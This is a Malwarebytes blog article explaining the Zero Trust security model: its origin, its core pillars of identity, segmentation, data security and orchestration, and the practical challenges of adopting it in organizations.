In a US court of law, the accused are deemed to be innocent until proven guilty. In a Zero Trust security model, the opposite is true. Everything and everyone must be considered suspect—questioned, investigated, and cross-checked—until we can be absolutely sure it is safe to be allowed. Zero Trust is a concept created by John Kindervag in 2010 during his time as Vice President and Principal Analyst for Forrester Research. When looking at failures inside organizations to stop cyberattacks, especially lateral movements of threats inside their networks, Kindervag realized that the traditional security model operated on the outdated assumption that everything inside an organization’s network could be trusted. Instead, Zero Trust inverts that model, directing IT teams according to the guiding principle of "never trust, always verify" and redefining the perimeter to include users and data inside the network. Over the last 10 years, more and more businesses have moved toward the Zero Trust model, demolishing the old castle-and-moat mentality and accepting the reality of insider threats. We take an inside look at Zero Trust, including its strengths and weaknesses, to help organizations evaluate whether they should embrace the philosophy within their own walls or consider different methods. Definition of Zero Trust Zero Trust is an information security framework that states organizations should not trust any entity inside or outside of their network perimeter at any time. It provides the visibility and IT controls needed to secure, manage, and monitor every device, user, app, and network belonging to or being used by the organization and its employees and contractors to access business data. The goal of a Zero Trust configuration should be clear: restrict access to sensitive data, applications, and devices on a need-to-know basis. Employees in finance need accounting software—all others should be barred. Remote workers should use VPNs—access from the open Internet should be prohibited. Data sharing should be limited and controlled. The free flow of information that was once one of the cornerstones of the Internet needs to be confined in order to protect networks from penetration, customers from privacy violations, and organizations from attacks on infrastructure and operations. The strategy around Zero Trust boils down to scrutinizing any incoming or outgoing traffic. But the difference between this and other security models is that even internal traffic, meaning traffic that doesn’t cross the perimeter of the organization, must be treated as a potential danger as well. While this might seem severe, consider the changes in the threat landscape over the last 10 years: the hundreds of public data leaks and breaches; ransomware attacks that halted operations on thousands of endpoints in cities, schools, and healthcare organizations; or millions of users' personally identifiable information stolen from business databases. As cybercriminals continue to turn their focus to business targets in 2020, Zero Trust seems like a smart approach to thwart increasing numbers of attacks. Implementing Zero Trust Implementing a Zero Trust security model in an organization is not simply a change in mindset. It will require a clear view of functions within the company's departments, currently-deployed software, access levels, and devices, and what each of those requirements will look like in the future. Often, building a Zero Trust network from the ground up is easier than reorganizing an existing network into Zero Trust because the existing network will need to remain functional throughout the transition period. In both scenarios, IT and security teams should come up with an agreed-upon strategy that includes the ideal final infrastructure and a step-by-step strategy on how to get there. For example, when setting up resource and data centers, organizations may have to start almost from scratch, especially if legacy systems are incompatible with the Zero Trust framework—and they often are. But even if companies don’t have to start from scratch, they may still need to reorganize specific functions within their security policy, such as how they deploy software or onboard employees, or which storage methods they use. Strengths of Zero Trust Building Zero Trust into the foundation of an organization's infrastructure can strengthen many of the pillars upon which IT and security are built. Whether it's in bolstering identification and access policies or segmenting data, by adding some simple barriers to entry and allowing access on an as-needed basis, Zero Trust can help organizations strengthen their security posture and limit their attack surface. Here are four pillars of Zero Trust that we believe organizations should embrace: - Strong user identification and access policies - Segmentation of data and resources - Strong data security in storage and transfer - Security orchestration User identification and access Using a secure combination of factors in multi-factor authentication (MFA) should provide teams with sufficient insight into who is making a request, and a well thought-out policy structure should confirm which resources they can access based on that identification. Many organizations gate access to data and applications by opting for identity-as-a-service (IDaaS) cloud platforms using single sign-on services. In a Zero Trust model, that access is further protected by verifying who is requesting access, the context of the request, and the risk of the access environment before granting entry. In some cases, that means limiting functionality of resources. In others, it might be adding another layer of authentication or session timeouts. Robust access policies will not make sense without proper segmentation of data and resources, though. Creating one big pool of data where everyone that passes the entrance test can jump in and grab whatever they want does not protect sensitive data from being shared, nor does it stop insiders from misusing security tools or other resources. By splitting segments of an organization's network into compartments, Zero Trust protects critical intellectual property from unauthorized users, reduces the attack surface by keeping vulnerable systems well guarded, and prevents lateral movement of threats through the network. Segmentation can also help limit the consequences of insider threats, including those that might result in physical danger to employees. Even with restricting access to data and reducing the attack surface through segmentation, organizations are open to breaches, data leaks, and interception of data if they do not secure their data in storage and in transit. End-to-end encryption, hashed data, automated backups, and securing leaky buckets are ways organizations can adopt Zero Trust into their data security plan. Finally, drawing a thread through all of these pillars is the importance of security orchestration. Even without a security management system, organizations using Zero Trust would need to ensure that security solutions work well together and cover all the possible attack vectors. Overlap is not a problem by itself, but it can be tricky to find the right settings to maximize efficiency and minimize conflicts. Challenges of the Zero Trust strategy Zero Trust is billed as a comprehensive approach to securing access across networks, applications, and environments from users, end-user devices, APIs, IoT, micro-services, containers, and more. While aiming to protect the workforce, workloads, and workplace, Zero Trust does encounter some challenges. These include: - More and different kinds of users (in office and remote) - More and different kinds of devices (mobile, IoT, biotech) - More and different kinds of applications (CMSes, intranet, design platforms) - More ways to access and store data (drive, cloud, edge) In the not-too-distant past, it was commonplace for the vast majority of the workforce to spend the entirety of their working hours at their place of employment. Not true today, where, according to Forbes, at least 50 percent of the US population engage in some form of remote work. That means accessing data from home IPs, routers, or public Wi-Fi, unless using a VPN service. But users are not necessarily limited to a workforce. Customers sometimes need to access an organization's resources, depending on the industry. Consider customers that want to select orders for their next delivery, check on inventory, participate in demos or trials, and of course access a company's website. Suppliers and third-party service companies may need access to other parts of an organization's infrastructure to check on operations, safety, and progress. All of these instances point to a wide variation in user base and a larger number of access points to cover. Coming up with specific policies for each of these groups and individuals can be time-consuming, and maintaining the constant influx of new employees and customers will add considerable workload for whomever manages this task moving forward. In this era of BYOD policies and IoT equipment, plus the "always on" mentality that sometimes strikes for remote employees, organizations must allow for a great variation in devices used for work, as well as the operating systems that come with them. Each of these devices have their own properties, requirements, and communication protocols, which will need to be tracked and secured under the Zero Trust model. Once again, this requires a bit more work upfront but likely yields positive results. Another challenging factor to take into account when adopting a Zero Trust strategy is the number of applications in use across the organization for people and teams to collaborate and communicate. The most versatile of these apps are cloud-based and can be used across multiple platforms. This versatility can, however, be a complicating factor when deciding what you want to allow and what not. Are the apps shared with third-party services, agencies, or vendors? Are the communication platforms outward-facing, and not just for employees? Is this application necessary only for a particular department, such as finance, design, or programming? All of these questions must be asked and answered before blindly adopting a stack of 60 applications for the entire workforce. One reason why the old security policies are growing out of favor is that there's no one, fixed location that needs to be protected any longer. Organizations can't just protect endpoints or corporate networks. More and more resources, data, and even applications are stored in cloud-based environments, meaning they can be accessed from anywhere and may rely on server farms in various global locations. This is further complicated by the potential shift to edge computing, which will require IT teams to switch from a centralized, top-down infrastructure to a decentralized trust model. As we have seen in our series about leaky cloud resources (AWS buckets and elastic servers), the configuration of data infrastructure in cloud services and beyond will need to be flawless if businesses don’t want it to end up as the weakest link in their Zero Trust strategy. To trust or not to trust Overhauling to a Zero Trust security framework isn't easily accomplished, but it's one we feel strengthen's an organization's overall security posture and awareness. IT teams looking to convince executives of the old guard might look for prime opportunities, then, to make their argument. For example, if there's already a planned move to cloud-based resources, that's a good time to suggest also adopting Zero Trust. Changes in the threat landscape, including recent vulnerabilities in VPNs and Citrix, plus ransomware being delivered through Remote Desktop Protocol (RDP), might encourage more organizations to investigate a Zero Trust solution, if only for identity and access management. These organizations will have to allow for a transition period and be prepared for some major changes. A proper Zero Trust framework that doesn’t automatically allow traffic inside the perimeter will certainly hinder the lateral threat movement that hackers use to tighten their grip on a breached network. Top business-focused threats such as Emotet and TrickBot would be hindered from spreading, as they'd be unable to work their way from server to server in a segmented network. Since the point of infiltration is usually not the target location of an attacker, setting up internal perimeters can also limit the severity of a successful attack. Add to these layers strong data security hygiene and intelligent orchestration that provides wide coverage across threat types, operating systems, and platforms, and businesses have a security framework that'd be pretty tough to beat today. In our eyes, that makes Zero Trust a hero.
<urn:uuid:25302394-d3f3-4109-b50c-47cafe11f663>
CC-MAIN-2022-40
https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00222.warc.gz
en
0.938021
2,465
2.625
3